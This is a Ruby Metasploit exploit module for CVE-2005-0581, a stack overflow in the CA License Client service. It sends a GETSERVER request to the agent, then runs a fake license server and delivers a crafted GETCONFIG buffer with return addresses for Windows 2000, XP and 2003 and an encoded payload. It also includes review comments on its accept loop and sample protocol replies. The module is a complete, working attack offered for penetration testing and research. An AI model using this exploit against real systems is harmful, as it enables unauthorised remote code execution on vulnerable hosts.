Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
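##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# CA License Client (lic98rmt.exe) GETCONFIG stack overflow, CVE-2005-0581.
#
# Flow: connect to the agent on RPORT and send "A0 GETSERVER", the agent then
# connects back to us on SRVPORT (it must be able to resolve our host name),
# and the oversized "A0 GETCONFIG SELF <buff>" reply we send on that
# connection triggers the overflow.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Computer Associates License Client GETCONFIG Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the CA License Client
          service. This exploit will only work if your IP address can be
          resolved from the target system point of view. This can be
          accomplished on a local network by running the 'nmbd' service
          that comes with Samba. If you are running this exploit from
          Windows and do not filter udp port 137, this should not be a
          problem (if the target is on the same network segment). Due to
          the bugginess of the software, you are only allowed one connection
          to the agent port before it starts ignoring you. If it wasn't for this
          issue, it would be possible to repeatedly exploit this bug.
        },
        'Author' => [
          'hdm', # original msf v2 module
          'aushack', # msf v3 port :)
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0581' ],
          [ 'OSVDB', '14389' ],
          [ 'BID', '12705' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 600,
          # NUL terminates the string copy and space is the protocol field separator.
          'BadChars' => "\x00\x20",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # As much as I would like to return back to the DLL or EXE,
          # all of those modules have a leading NULL in the
          # loaded @ address :(
          # name, jmp esi, writable, jmp edi
          # ['Automatic', {} ],
          #
          # aushack - tested OK Windows XP English SP0-1 only 20100214
          ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
          ['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
        ],
        'DisclosureDate' => '2005-03-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10203),
        OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
      ]
    )
  end

  # def check
  # It is possible to check, but due to a software bug, checking prevents exploitation
  # end

  # Kick the agent on RPORT, then stand up a fake license server on SRVPORT
  # and deliver the overflow on the agent's connect-back.
  #
  # Fixes over the previous revision: the accept loop now terminates once the
  # exploit has been sent (`done` was never set, so the loop only ever ended
  # when the 3 second Timeout fired), and the timeout is reported explicitly
  # instead of being swallowed by a `return` inside `ensure`, which also
  # discarded every other exception raised while waiting.
  def exploit
    return unless connect

    sock.put("A0 GETSERVER<EOM>\n")
    print_status("Initial packet sent to remote agent...")
    disconnect

    # NOTE: the listener binds every local interface, not only the one that
    # faces the target; make sure SRVPORT is not exposed more widely than intended.
    fakecaservice = Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['SRVPORT'],
      'SSL' => false,
      'Context' =>
      {
        'Msf' => framework,
        'MsfExploit' => self,
      }
    )

    add_socket(fakecaservice)

    fakecaservice.start
    print_status("Waiting for the license agent to connect back...")
    begin
      Timeout.timeout(3) do
        done = false
        while (not done and session = fakecaservice.accept)
          # NOTE(review): source_address(rhost) is our own local address toward
          # rhost, not the peer that just connected; the agent address would
          # come from the accepted session instead.
          print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
          session.put("A0 GETCONFIG SELF 0<EOM>")
          req = session.recvfrom(2000)[0]
          next if not req
          next if req.empty?

          if (req =~ /OS\<([^\>]+)/)
            print_status("Target reports OS: #{$1}")
          end

          # exploits two different versions at once >:-)
          # 144 -> return address of esi points to string middle
          # 196 -> return address of edi points to string beginning
          # 148 -> avoid exception by patching with writable address
          # 928 -> seh handler (not useful under XP SP2)
          buff = rand_text_alphanumeric(900)
          buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
          buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
          buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
          buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
          buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
          buff[272, payload.encoded.length] = payload.encoded # 272 + 600 stays inside the 900 byte buffer

          sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
          session.put(sploit)
          session.close
          # The agent only honours one connection (see Description); stop
          # accepting instead of spinning until the timeout fires.
          done = true
        end
      end
    rescue Timeout::Error
      print_error("Timed out waiting for the license agent to connect back to SRVPORT #{datastore['SRVPORT']}")
    ensure
      handler
      fakecaservice.close
    end
  end
end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end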